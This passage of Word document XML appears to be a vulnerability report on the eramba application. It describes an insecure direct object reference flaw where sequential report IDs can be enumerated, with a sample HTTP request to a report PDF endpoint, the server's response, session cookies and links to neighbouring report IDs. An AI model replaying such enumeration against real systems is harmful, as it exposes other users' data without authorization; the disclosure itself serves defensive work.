        <w:t xml:space="preserve">This is made possible by a weakness called IDOR (insecure direct object reference), where an attacker can simply enumerate all values (16, 17, 18...etc) because they are predictable. I'm not able to verify what else the key can be used to access but it's possible that this can be used to gain access to admin endpoints, e.g. Settings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">REQUEST:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /reports/reports/pdf/17 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept-Language: en-US,en;q=0.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept-Encoding: gzip, deflate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Referer: https://demo-e.eramba.org/securityPolicies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie: _ga=GA1.2.401434484.1602046464; ErambaCookie[Config]=Q2FrZQ%3D%3D.VFkUD3Byour1NiCqhGyfgdaN6WY%3D; Eramba=uilehi227t1l76io63k4pklhgc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RESPONSE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP/1.1 500 Internal Server Error</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: Sun, 25 Oct 2020 07:05:48 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Server: Apache/2.4.29 (Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Disposition: attachment; filename="report.pdf"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-Cookie: ErambaCookie[Config]=Q2FrZQ%3D%3D.VFkUD3Byour1NiCqhGyfgdaN6WY%3D; path=/; domain=8.8.8.8; secure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Length: 187041</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: text/html; charset=UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The version of eramba you are using. Ideally you should be using the latest community or enterprise release.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>
          <w:color w:val="212529"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="2f3941"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I was using e2.2.[12-17]</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Open Sans" w:cs="Open Sans" w:eastAsia="Open Sans" w:hAnsi="Open Sans"/>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emo-e.eramba.org/reports/reports/pdfContent/18?key=" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://demo-e.eramba.org/reports/reports/pdfContent/17?key=" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://demo-e.eramba.org/reports/reports/pdfContent/16?key=" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:xxxx@xxxx.com" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://demo-e.eramba.org/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://8.8.8.8/reports/reports/pdfContent/17?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